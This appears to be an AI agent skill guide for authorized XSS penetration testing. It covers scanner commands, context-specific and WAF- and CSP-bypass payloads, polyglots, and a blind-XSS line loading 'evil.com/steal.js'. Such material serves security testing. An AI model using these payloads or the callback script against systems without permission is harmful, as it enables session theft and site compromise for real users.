Cross-Site Scripting (XSS) Detection Skill

⚠️ DANGER - Authorization Required

This skill is for AUTHORIZED SECURITY TESTING ONLY.

You must have:

Written permission from the target system owner
Legal authorization to test the target
A defined scope of testing

Unauthorized XSS testing is ILLEGAL and unethical.

Prerequisites

Required Tools

bash

# XSStrike - Advanced XSS scanner with DOM support
pip install xsstrike
# Or: git clone https://github.com/s0md3v/XSStrike

# Dalfox - Fast XSS scanner with pipeline mode
go install github.com/hahwul/dalfox/v2@latest

# XSpear - XSS testing with WAF bypass
gem install xspear

Python Requirements

bash

# Install required Python packages for built-in scripts
pip install requests beautifulsoup4

# Optional: WebSocket XSS testing
pip install websockets

Optional Tools

bash

# Burp Suite for manual testing
# OWASP ZAP for automated scanning

Quick Start

Basic URL Testing

bash

# Test a URL parameter for XSS
python xsstrike.py -u "https://target.com/search?q=test"

# Fast scanning with Dalfox
dalfox url "https://target.com/search?q=test"

POST Request Testing

bash

# Save POST request to file
dalfox file request.txt

# Or use XSStrike
python xsstrike.py -r request.txt

DOM XSS Testing

bash

# DOM XSS with XSStrike
python xsstrike.py -u "https://target.com/page#test" --dom

# DOM XSS with Dalfox
dalfox url "https://target.com/page#test" --dom

Common Scenarios

1. Basic Parameter Testing (Reflected XSS)

Test URL parameters for reflection and injection:

bash

# Single URL testing
python xsstrike.py -u "https://target.com/search?q=test"

# Dalfox for faster scanning
dalfox url "https://target.com/search?q=test"

# Specify parameter
dalfox url "https://target.com/search" -p q

What to check:

Does the input reflect in the HTML response?
What is the context (HTML tag, attribute, JavaScript)?
Are there any filters/encoding applied?

2. POST Request XSS (Form Testing)

Test POST forms for stored/reflected XSS:

bash

# Save request to file first
echo 'POST /login HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

username=test&password=test' > post_request.txt

# Test with XSStrike
python xsstrike.py -r post_request.txt

# Test with Dalfox
dalfox file post_request.txt

Common POST targets:

Login forms (username, email fields)
Contact forms (name, message fields)
Search forms
Comment forms
User profile updates

3. Cookie and Header XSS

Test HTTP headers and cookies for injection:

bash

# Test with custom cookies
python xsstrike.py -u "https://target.com" --cookie "session=test&user=<script>alert(1)</script>"

# Test User-Agent header
python xsstrike.py -u "https://target.com" --user-agent "<script>alert(1)</script>"

# Test Referer header (often reflects in error pages)
python xsstrike.py -u "https://target.com" --referer "https://evil.com/<script>alert(1)</script>"

Headers to test:

User-Agent (check application logs/error pages)
Referer (check 404 pages, analytics)
X-Forwarded-For (check IP reflection)
Cookie (check welcome messages/logs)

4. Reflected XSS Detection

Identify reflection points and test payloads:

bash

# Automated reflection detection
dalfox url "https://target.com/search?q=test" --only-discovery

# Manual reflection analysis
scripts/xss_context_analyzer.py "https://target.com/search?q=test"

# Differential response analysis
python xsstrike.py -u "https://target.com/search?q=test" --blind

Detection techniques:

Compare response length with/without payload
Search for payload in response HTML
Check for encoding/filtering patterns
Identify HTML context (tag, attribute, JS, CSS)

5. Stored XSS Testing (Database Persistence)

Test for XSS that persists in the database:

bash

# Test comment/feedback forms
dalfox file post_request.txt --blind https://your-callback.burpcollaborator.net

# Test user profile fields
python xsstrike.py -r profile_update_request.txt

# Time-based detection for stored XSS
scripts/blind_xss_tester.py --url "https://target.com/contact" --form-data "name=test&email=test@test.com&message=payload"

Stored XSS targets:

User profiles (name, bio, location)
Comments/Reviews
Forum posts
Email/contact forms (admin panel XSS)
File upload metadata

6. DOM XSS Discovery

Find client-side XSS vulnerabilities:

bash

# DOM XSS scanning
python xsstrike.py -u "https://target.com/page#input" --dom

# Dalfox DOM mode
dalfox url "https://target.com/page#input" --dom

# Manual DOM source analysis
scripts/xss_context_analyzer.py --dom "https://target.com/page"

Common DOM sources:

```
location.hash
```
```
location.search
```
```
document.cookie
```
```
document.referrer
```
```
window.name
```

Common DOM sinks:

```
innerHTML
```
```
document.write()
```
```
eval()
```
```
location.href
```
```
setTimeout()
```
/
```
setInterval()
```

7. Blind XSS in Forms (Contact/Admin XSS)

Test XSS in forms that execute in admin panels:

bash

# Generate blind XSS payloads with callback
scripts/xss_payload_generator.py --blind --callback "https://your-callback.com"

# Test contact form with blind payload
dalfox file contact_request.txt --blind https://your-callback.burpcollaborator.net

# XSpear blind mode
xspear -u "https://target.com/contact" -d "name=test&message=<script src=https://evil.com/steal.js></script>"

Blind XSS testing tips:

Use unique payloads per test (to identify which parameter is vulnerable)
Use Burp Collaborator or interactsh for callbacks
Test email contact forms (executes when admin opens email)
Test support ticket systems

8. Context-Aware Payloads

Use payloads specific to the injection context:

bash

# Analyze context first
scripts/xss_context_analyzer.py "https://target.com/search?q=test"

# Generate context-specific payloads
scripts/xss_payload_generator.py --context html-attribute
scripts/xss_payload_generator.py --context javascript
scripts/xss_payload_generator.py --context url

Context-specific payloads:

HTML Body/Tag:

html

<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>

HTML Attribute:

html

" onmouseover=alert('XSS')
javascript:alert('XSS')

JavaScript:

javascript

';alert('XSS');//
'-alert('XSS')-
</script><script>alert('XSS')</script>

CSS/Style:

css

</style><script>alert('XSS')</script>
expression(alert('XSS'))

9. WAF Bypass Techniques

Evade Web Application Firewalls:

bash

# Generate WAF bypass payloads
scripts/xss_payload_generator.py --waf-bypass

# Use XSpear with bypass mode
xspear -u "https://target.com/search?q=test" --bypass

# Test various encodings
python xsstrike.py -u "https://target.com/search?q=test" --encode

Bypass techniques:

URL encoding:
```
%3Cscript%3Ealert(1)%3C/script%3E
```
Double encoding:
```
%253Cscript%253E
```
Unicode encoding:
```
\u003Cscript\u003E
```
HTML entities:
```
&lt;script&gt;alert(1)&lt;/script&gt;
```
Case mixing:
```
<ScRiPt>alert(1)</sCrIpT>
```

Comment injection:

<script><!-- anything -->alert(1)</script>

Tab/newline injection:
```
<script\t>alert(1)</script>
```

10. Automated Scanning (Batch Testing)

Scan multiple URLs/parameters:

bash

# Scan from file
dalfox file urls.txt

# Pipe from other tools
cat urls.txt | dalfox pipe

# XSStrike with multiple targets
for url in $(cat urls.txt); do python xsstrike.py -u "$url"; done

# Combine with subdomain enumeration
subfinder example.com | httpx | dalfox pipe

11. Payload Encoding Variations

Test with different encoding schemes:

bash

# URL encode payloads
scripts/xss_payload_generator.py --encode url

# HTML encode
scripts/xss_payload_generator.py --encode html

# Hex encode
scripts/xss_payload_generator.py --encode hex

# Test with XSStrike encoding
python xsstrike.py -u "https://target.com" --encode

Common encodings to test:

Plain:
```
<script>alert(1)</script>
```
URL encoded:
```
%3Cscript%3Ealert(1)%3C/script%3E
```
Double URL encoded:
```
%253Cscript%253E
```
HTML entities:
```
&lt;script&gt;alert(1)&lt;/script&gt;
```
Hex:
```
\x3Cscript\x3Ealert(1)\x3C/script\x3E
```

Unicode:

\u003Cscript\u003Ealert(1)\u003C/script\u003E

12. Polyglot Payloads

Test with payloads that work in multiple contexts:

bash

# Generate polyglot payloads
scripts/xss_payload_generator.py --polyglot

# Common polyglot payload
# Works in: HTML, HTML attribute, JavaScript string, etc.
javascript://%250Aalert(1)//%250A?javascript://alert(1)//%0A

Famous polyglot payloads:

javascript

# Ashar Javed's polyglot
%3Cscript%3Ealert(1)%3C/script%3E

# Mathias Karlsson's polyglot
javascript://%250Aalert(1)//%250A?javascript://alert(1)//%0A

# Another polyglot
%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E

13. CSP Detection and Bypass

Content Security Policy analysis and bypass testing:

bash

# Detect and analyze CSP
python scripts/csp_detector.py https://target.com

# Generate bypass report
python scripts/csp_detector.py https://target.com --bypass

# Full CSP analysis
python scripts/csp_detector.py https://target.com --verbose

Common CSP bypass techniques:

```
unsafe-inline
```
- allows inline scripts
```
unsafe-eval
```
- allows eval(), setTimeout()
```
data:
```
URLs - inline scripts via data URI
Wildcard sources - allows any domain
Nonce-based bypasses
Framework-specific bypasses

See

references/csp_bypass_guide.md

for detailed techniques.

14. Framework-Specific XSS

Test for Angular, React, Vue, and other framework vulnerabilities:

bash

# Auto-detect frameworks
python scripts/framework_xss_tester.py --url https://target.com --detect

# Test Angular XSS
python scripts/framework_xss_tester.py --url https://target.com --param q --framework angular

# Test React XSS
python scripts/framework_xss_tester.py --url https://target.com --param data --framework react

# Test Vue XSS
python scripts/framework_xss_tester.py --url https://target.com --param content --framework vue

Common framework vectors:

Angular:

{{constructor.constructor('alert(1)')()}}

React:
```
dangerouslySetInnerHTML
```
Vue:
```
v-html
```
directive
jQuery:
```
.html()
```
manipulation

See

references/framework_xss_guide.md

for detailed techniques.

15. SVG File Upload XSS

Test for SVG-based XSS in file uploads:

bash

# Generate SVG payloads
python scripts/svg_xss_tester.py --generate --variant file_upload

# Test SVG injection
python scripts/svg_xss_tester.py --url https://target.com --param content

# Test SVG file upload
python scripts/svg_xss_tester.py --upload-url https://target.com/upload --file-param avatar

# Create exploit SVG
python scripts/svg_xss_tester.py --save-svg exploit.svg --callback https://your-callback.com

SVG XSS vectors:

```
<svg onload="alert('XSS')">
```

<svg><script>alert('XSS')</script></svg>

<svg><foreignObject><iframe src="javascript:alert('XSS')"></iframe></foreignObject></svg>

See

references/svg_xss_guide.md

for detailed techniques.

16. Mutation XSS (mXSS)

Test for HTML mutation-based XSS:

bash

# Test all mutation types
python scripts/mutation_xss_tester.py --url https://target.com --param q --type all

# Test DOM clobbering
python scripts/mutation_xss_tester.py --url https://target.com --param q --dom-clobber

# Test attribute mutations
python scripts/mutation_xss_tester.py --url https://target.com --param q --attribute

Mutation XSS vectors:

Entity decoding mutations:
```
&lt;
```
→
```
<
```
Tag parsing mutations:
```
<xmp>
```
,
```
<listing>
```
DOM clobbering:
```
<a id="location">
```
Namespace mutations: SVG/MathML

See

references/mutation_xss_guide.md

for detailed techniques.

17. WebSocket XSS

Test for XSS vulnerabilities in WebSocket connections:

bash

# Scan URL for WebSocket endpoints
python scripts/websocket_xss_tester.py --url https://target.com

# Test specific WebSocket URL
python scripts/websocket_xss_tester.py --ws-url wss://target.com/ws

# Test DOM injection via WebSocket
python scripts/websocket_xss_tester.py --ws-url wss://target.com/ws --test-dom

# Test stored XSS in WebSocket
python scripts/websocket_xss_tester.py --ws-url wss://target.com/ws --test-stored

# Test with custom payload
python scripts/websocket_xss_tester.py --ws-url wss://target.com/ws --payload '<script>alert(1)</script>'

WebSocket XSS vectors:

Message reflection:
```
ws.send('<script>alert(1)</script>')
```

JSON injection:

{"message": "<img src=x onerror=alert(1)>"}

Event handler:
```
ws.send('alert(1);')
```
Attribute breaking:
```
" onmouseover=alert(1)
```

See

references/websocket_xss_guide.md

for detailed techniques.

Tool Selection Guide

Scenario	Recommended Tool	Command
Quick parameter testing	Dalfox	`dalfox url "https://target.com?param=test"`
Deep scanning with DOM	XSStrike	`python xsstrike.py -u "URL" --dom`
WAF bypass testing	XSpear	`xspear -u "URL" --bypass`
Stored/Blind XSS	Dalfox + Callback	`dalfox file req.txt --blind CALLBACK`
Manual testing	XSStrike	`python xsstrike.py -r request.txt`
Batch scanning	Dalfox pipe	`cat urls.txt \| dalfox pipe`
CSP Analysis	CSP Detector	`python scripts/csp_detector.py URL`
Framework XSS	Framework Tester	`python scripts/framework_xss_tester.py -u URL -p param`
SVG XSS	SVG Tester	`python scripts/svg_xss_tester.py -u URL -p param`
Mutation XSS	Mutation Tester	`python scripts/mutation_xss_tester.py -u URL -p param`
WebSocket XSS	WebSocket Tester	`python scripts/websocket_xss_tester.py -u URL`
Full Scan	Full Scanner	`python scripts/xss_full_scan.py -u URL --all`

Tool Comparison:

Feature	XSStrike	Dalfox	XSpear	Built-in Scripts
Speed	Medium	Fast	Medium	Varies
DOM XSS	Excellent	Good	Limited	Good
WAF Bypass	Good	Good	Excellent	Good
Pipeline Mode	No	Yes	No	No
Blind XSS	Yes	Yes	Yes	Yes
CSP Analysis	No	No	No	Yes
Framework Testing	No	No	No	Yes
SVG Testing	No	No	No	Yes
Mutation XSS	No	No	No	Yes
WebSocket XSS	No	No	No	Yes

Testing Checklist

Reconnaissance Phase

Identify all input points (URL params, forms, headers, cookies)
Map out application functionality
Identify data storage locations

Reflected XSS Testing

Test all URL parameters
Test all form fields (GET/POST)
Test HTTP headers (UA, Referer, Cookie)
Identify reflection context
Test context-specific payloads

Stored XSS Testing

Test all form submissions
Test file upload metadata
Test user profile fields
Test comments/reviews
Verify persistence across sessions
Test execution in different user contexts

DOM XSS Testing

Identify all DOM sources
Trace data flow to sinks
Test hash-based injections
Test URL parameter-based injections
Test localStorage/sessionStorage

Advanced Testing

Test WAF bypass techniques
Test encoding variations
Test polyglot payloads
Perform blind XSS testing
Test for CSP bypasses
Test framework-specific XSS (Angular/React/Vue)
Test SVG file upload XSS
Test Mutation XSS (DOM clobbering)
Test HTTP response header injection
Test WebSocket XSS (if applicable)

Scenario: Persistent Storage of XSS Findings

When you need to persist XSS findings to the database:

bash

# Manual entry after discovering XSS
python .claude/skills/exploit-xss/scripts/xss_storage.py \
  --host-ip 192.168.1.100 \
  --url "https://example.com/search?q=test" \
  --xss-type reflected \
  --payload "<script>alert(1)</script>" \
  --context html_body \
  --severity High \
  --subsystem "Web Application"

Parameters:

```
--host-ip
```
- Target host IP (required)
```
--url
```
- Vulnerable URL (required)
```
--xss-type
```
- XSS type: reflected, stored, or dom (required)
```
--payload
```
- Payload used (required)
```
--context
```
- XSS context: html_body, html_attribute, javascript, dom, url (default: html_body)
```
--severity
```
- Severity level (default: Medium)
```
--subsystem
```
- Subsystem name (optional)
```
--parameter
```
- Vulnerable parameter name
```
--title
```
- Vulnerability title (auto-generated if not specified)
```
--description
```
- Vulnerability description
```
--cvss-score
```
- CVSS score (0.0-10.0)

Database location:

./data/results.db

Related skills:

results-storage

- Query data, generate reports

Resources

Scripts

```
scripts/xss_payload_generator.py
```
- Generate XSS payloads for various contexts
```
scripts/xss_tester.py
```
- Automated XSS testing framework
```
scripts/xss_context_analyzer.py
```
- Analyze injection context
```
scripts/blind_xss_tester.py
```
- Test stored/blind XSS
```
scripts/csp_detector.py
```
- CSP analysis and bypass testing
```
scripts/svg_xss_tester.py
```
- SVG file upload XSS testing
```
scripts/framework_xss_tester.py
```
- Angular/React/Vue XSS testing
```
scripts/mutation_xss_tester.py
```
- Mutation XSS/DOM clobbering testing
```
scripts/websocket_xss_tester.py
```
- WebSocket XSS testing
```
scripts/mxss_detector.py
```
- HTML parser mutation XSS detection
```
scripts/xss_full_scan.py
```
- Integrated XSS testing automation

Reference Documentation

```
references/dalfox_guide.md
```
- Dalfox complete guide
```
references/xsstrike_guide.md
```
- XSStrike complete guide
```
references/xspear_guide.md
```
- XSpear complete guide
```
references/xss_payload_techniques.md
```
- XSS payload techniques
```
references/dom_xss_guide.md
```
- DOM XSS testing guide
```
references/csp_bypass_guide.md
```
- CSP bypass techniques
```
references/framework_xss_guide.md
```
- Framework-specific XSS guide
```
references/svg_xss_guide.md
```
- SVG XSS testing guide
```
references/mutation_xss_guide.md
```
- Mutation XSS/DOM clobbering guide
```
references/websocket_xss_guide.md
```
- WebSocket XSS testing guide

Assets/Wordlists

```
assets/common_xss_payloads.txt
```
- Basic XSS payloads
```
assets/attribute_xss_payloads.txt
```
- Attribute context payloads
```
assets/dom_xss_payloads.txt
```
- DOM XSS payloads
```
assets/blind_xss_payloads.txt
```
- Blind XSS with callbacks
```
assets/polyglot_xss_payloads.txt
```
- Multi-context payloads
```
assets/waf_bypass_payloads.txt
```
- WAF evasion payloads
```
assets/csp_bypass_payloads.txt
```
- CSP bypass payloads
```
assets/framework_xss_payloads.txt
```
- Angular/React/Vue payloads
```
assets/svg_xss_payloads.txt
```
- SVG XSS payloads
```
assets/mutation_xss_payloads.txt
```
- Mutation XSS payloads
```
assets/websocket_xss_payloads.txt
```
- WebSocket XSS payloads

External Resources

Common Responses & Troubleshooting

"No XSS found"

Try different payload encodings
Test with DOM scanner enabled
Check if there's a WAF blocking
Test with blind XSS payloads
Verify the parameter actually reflects

"Payload is reflected but not executing"

Analyze the context using context analyzer
Use context-specific payloads
Check for CSP (Content Security Policy)
Check for input sanitization
Try alternative tags/event handlers

"403 / WAF blocked"

Use WAF bypass payloads
Try different encoding methods
Use XSpear with --bypass flag
Test with smaller payloads first
Try alternative injection points

Reporting Format

When reporting XSS vulnerabilities, include:

╔═══════════════════════════════════════════════════════╗
║              XSS Vulnerability Report                 ║
╠═══════════════════════════════════════════════════════╣
║ Target: https://target.com/search                     ║
║ Type: Reflected XSS                                   ║
║ Severity: High                                        ║
╚═══════════════════════════════════════════════════════╝

Vulnerable Parameter: q
Injection Context: HTML attribute (value)
Payload: " onmouseover=alert('XSS')

Proof of Concept:
https://target.com/search?q=%22%20onmouseover%3Dalert('XSS')

Impact:
- Execute arbitrary JavaScript in victim's browser
- Steal session cookies
- Perform actions on behalf of victim
- Deface website

Recommendations:
- Implement proper output encoding
- Use Content Security Policy (CSP)
- Validate and sanitize all input
- Use framework-provided escaping functions

exploit-xss

NPX Install

Tags

SKILL.md Content

Cross-Site Scripting (XSS) Detection Skill

⚠️ DANGER - Authorization Required

Prerequisites

Required Tools

Python Requirements

Optional Tools

Quick Start

Basic URL Testing

POST Request Testing

DOM XSS Testing

Common Scenarios

1. Basic Parameter Testing (Reflected XSS)

2. POST Request XSS (Form Testing)

3. Cookie and Header XSS

4. Reflected XSS Detection

5. Stored XSS Testing (Database Persistence)

6. DOM XSS Discovery

7. Blind XSS in Forms (Contact/Admin XSS)

8. Context-Aware Payloads

9. WAF Bypass Techniques

10. Automated Scanning (Batch Testing)

11. Payload Encoding Variations

12. Polyglot Payloads

13. CSP Detection and Bypass

14. Framework-Specific XSS

15. SVG File Upload XSS

16. Mutation XSS (mXSS)

17. WebSocket XSS

Tool Selection Guide

Testing Checklist

Reconnaissance Phase

Reflected XSS Testing

Stored XSS Testing

DOM XSS Testing

Advanced Testing

Scenario: Persistent Storage of XSS Findings

Resources

Scripts

Reference Documentation

Assets/Wordlists

External Resources

Common Responses & Troubleshooting

"No XSS found"

"Payload is reflected but not executing"

"403 / WAF blocked"

Reporting Format